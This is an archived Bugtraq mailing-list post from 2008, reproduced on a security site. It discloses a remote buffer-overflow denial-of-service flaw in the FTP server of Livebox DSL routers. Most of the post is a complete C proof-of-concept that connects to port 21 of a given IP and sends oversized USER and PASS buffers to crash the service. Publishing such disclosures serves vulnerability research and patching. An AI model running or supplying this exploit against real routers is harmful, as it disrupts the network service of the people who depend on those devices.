Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos

Bugtraq: Livebox Router vulnerability to REMOTE BUFFER OVERFLOW DoS (FTPD)_

Livebox Router vulnerability to REMOTE BUFFER OVERFLOW DoS (FTPD)_

From: <0in.email_at_gmail.com>
Date: 1 Mar 2008 21:31:07 -0000
('binary' encoding is not supported, stored as-is) Livebox Router vulnerability to REMOTE BUFFER OVERFLOW DoS

Discovered by: 0in from DaRk-CodeRs Security & Programming Group!
http://dark-coders.4rh.eu

DESCRIPTION:
Livebox (tested on polish "Neostrada TP Livebox") is vulnerability to remote (but from local network, because firewall working..) buffer overflow DoS attack to FTP service.
FULL FTP SERVER NAME:"ADI Convergence Galaxy FTP server v0.1".

POC:

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>

int port=21;
struct hostent *he;
struct sockaddr_in their_addr;

int konekt(char *addr)
{
  int sock;

  he=gethostbyname(addr);
  if(he==NULL)
  {
    printf("Unknow host!\nexiting...");
    return -1;
  }
  if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1)
  {
    perror("socket");
    return -2;
  }

  their_addr.sin_family = AF_INET;
  their_addr.sin_port = htons(port);
  their_addr.sin_addr = *((struct in_addr *)he->h_addr);
  memset(&(their_addr.sin_zero), '\0', 8);
  if (connect(sock, (struct sockaddr *)&their_addr,
      sizeof(struct sockaddr)) == -1)
  {
    perror("connect");
    return -1;
  }

  return sock;
}

int main(int argc,char *argv[])
{
        printf("\n+===============================Yeah======================================+");
        printf("\n+= ADI Convergence Galaxy FTP Server v1.0 (Neostrada Livebox DSL Router) =+");
        printf("\n+= Remote Buffer Overflow DoS Exploit =+");
        printf("\n+= bY =+");
        printf("\n+= Maks M. [0in] From Dark-CodeRs Security & Programming Group! =+");
        printf("\n+= 0in(dot)email[at]gmail(dot)com =+");
        printf("\n+= Please visit: http://dark-coders.4rh.eu =+");
        printf("\n+= Greetings to: Die_Angel, Sun8hclf, M4r1usz, Aristo89, Djlinux =+");
        printf("\n+= MaLy, Slim, elwin013, Rade0n3900, Wojto111, =+");
        printf("\n+= Chomzee, AfroPL, Joker186 =+");
        printf("\n+===============================Yeah======================================+");

        if(argc<2)
        {
                printf("\nUse %s [IP]!\n",argv[0]);
                exit(0);
        }
        printf("\nConnecting to:%s...",argv[1]);
int sock=konekt(argv[1]);
if(sock<0)
{
        printf("\neh...");
        exit(0);
}
printf("\nConnected!!\n");
char rcv[256];
recv(sock,rcv,255,0);
printf("\n%s\n",rcv);
printf("\nSending evil buffer..");
char evil[100*100]="%n\x01\x02\x03\x04";
int i;
for(i=0;i<(100*100)-100;i++)
{
        strcat(evil,"A");
}

strcat(evil,"\r\n");
send(sock,evil,strlen(evil),0);
strcpy(rcv,"");
recv(sock,rcv,255,0);
printf("\n%s\n",rcv);
char pass[100*1000]="PASS ";
strcat(pass,evil);
strcat(pass,"\n\r");
send(sock,pass,strlen(pass),0);
strcpy(rcv,"");
recv(sock,rcv,255,0);
printf("\n%s\n",rcv);
printf("\nOK!\nYou're Livebox FTP server should fu**ed out...");

exit(0);
}

EOF.
Received on Mar 01 2008

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]